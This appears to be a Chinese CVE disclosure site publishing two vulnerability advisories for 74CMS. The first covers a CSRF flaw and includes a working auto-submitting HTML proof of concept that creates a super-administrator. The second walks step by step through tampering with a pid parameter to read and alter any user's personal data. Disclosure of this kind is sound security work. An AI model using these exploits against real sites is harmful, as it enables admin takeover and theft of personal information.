CVE中文申请站

CVE-2019-11374:骑士74CMS v5.0.1后台管理页面存在CSRF漏洞

一、漏洞摘要

漏洞名称: 骑士74CMS v5.0.1后台管理页面存在CSRF漏洞
上报日期: 2019-04-14
漏洞发现者: ax8
产品首页: http://www.74cms.com/
软件链接: http://www.74cms.com/download/index.html
版本: v5.0.1
CVE编号: CVE-2019-11374


二、漏洞概述

登陆后台管理页面如下,可以添加管理员
1.png
输入信息点击添加
2.png
抓取数据包如下
3.png
测试发现其存在CSRF漏洞,管理员登陆后台管理界面后,点击hacker发来的如下链接,即可创建一个新的超级管理员用户
4.png

三、利用代码

exp代码如下:

<!--poc.html(creat a administrater)-->
<!DOCTYPE html>
<html>
  <head>
  <title> CSRF Proof</title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="http://localhost/index.php?m=Admin&c=admin&a=add" method="POST">
      <input type="hidden" name="username" value="hacker1" />
  <input type="hidden" name="email" value="111111111@qq.com" />
      <input type="hidden" name="password" value="hacker1" />
      <input type="hidden" name="repassword" value="hacker1" />  
  <input type="hidden" name="role_id" value="1" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/203/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11374
exploit-db:发布中

CVE-2018-20519:74cms v4.2.111权限逻辑漏洞

一、漏洞摘要

漏洞名称: 74cms v4.2.111权限逻辑漏洞
上报日期: 2018-12-27
漏洞发现者: erpang
产品首页: http://www.74cms.com/
软件链接: http://www.74cms.com/download/load/id/534.html
版本: v4.2.111
CVE编号: CVE-2018-20519


二、漏洞概述

注册一个用户,创建简历,随后修改求职意向,可导致修改任意人员并泄露个人信息。
漏洞分析如下:
1.png
只对简历是否存在做检测并未对用户权限操作检查,C(‘visitor’)返回当前用户
2.png
通过方法D
3.png
调用resumemodel.class.php中save_resume方法,如下图所示:
4.png
其中更新简历调用的方法如下图所示:
5.png
跟进save方法,将当前数据对象,如下图所示:
6.png
首先会将$data中的数据进行过滤去除特殊符号,随后进入判断是否存在主键,根据主键更新数据,进入更新方法,如下图所示:
7.png
由于上述未对用户操作进行校验,通过update方法后,用户可将求职意向更改到任意用户(pid),通过update_user_info将更改后的数据更新到用户页面,达到访问和修改任意用户信息,任意用户信息通过$pid获得,如下图所示:
8.png

三、利用过程

实现步骤,第一步:创建一个账户
9.png
第二步:根据要求完善简历
10.png
第三步:点击修改求职意向
11.png
第四步:抓包修改pid的值
12.png
攻击后截图:
13.png
可以遍历pid的值获取所有用户的个人信息并可以下载个人简历(由于注册使用为手机号,更新时会将原来用户的手机号同样更新)

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/104/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20519
exploit-db:发布中